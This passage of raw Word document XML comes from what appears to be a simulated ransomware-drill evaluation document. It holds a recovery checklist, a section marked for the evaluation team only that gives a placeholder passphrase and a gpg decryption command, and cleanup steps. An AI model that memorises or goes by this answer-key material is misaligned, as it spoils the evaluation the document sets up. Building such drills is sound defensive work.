          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Backup freshness:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Was the most recent backup less than 24 hours old? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Restore completeness:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Were all encrypted files successfully restored? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Data integrity:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Did any restored files show corruption or modification? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>User communication:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Was the ransom note reported immediately to IT/Security? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Forensic preservation:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Were encrypted files (.gpg) and ransom note preserved for analysis? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Decryption Key (For Evaluation Team Only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following information is confidential and should only be used by authorized evaluation personnel:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8058" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2831"/>
        <w:gridCol w:w="5227"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5227" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Encryption Algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5227" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>AES256 (GPG symmetric)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Evaluation Passphrase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5227" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>EVAL-TEST-{PLACEHOLDER_PASSPHRASE}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Decryption Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5227" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>gpg --batch --yes --passphrase "EVAL-TEST-{PLACEHOLDER_PASSPHRASE}" --decrypt file.docx.gpg &gt; file.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Backup Source (Simulated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5227" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/backup/evaluation/snapshot-{PLACEHOLDER_DATE}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Post-Evaluation Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Upon completion of the evaluation, the following actions must be performed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Remove all encrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.gpg</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Delete the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>RECOVERY_INSTRUCTIONS.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file from the Desktop. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Restore original .docx files from the backup or using the decryption command in Section 6. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Submit the completed evaluation checklist to {PLACEHOLDER_MANAGER_EMAIL}. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Conduct a debrief meeting with the evaluation team within 48 hours. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="540" w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>End of Document —</w:t>
        <w:br/>
        <w:t xml:space="preserve">Security Evaluation Task | Version 1.2 | {PLACEHOLDER_DATE}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hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman;Times;serif" w:hAnsi="Times New Roman;Times;serif" w:eastAsia="Times New Roman;Times;serif" w:cs="Times New Roman;Times;serif"/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="5" w:color="8B0000"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="8B0000"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="270" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="34495E"/>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15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C3E50"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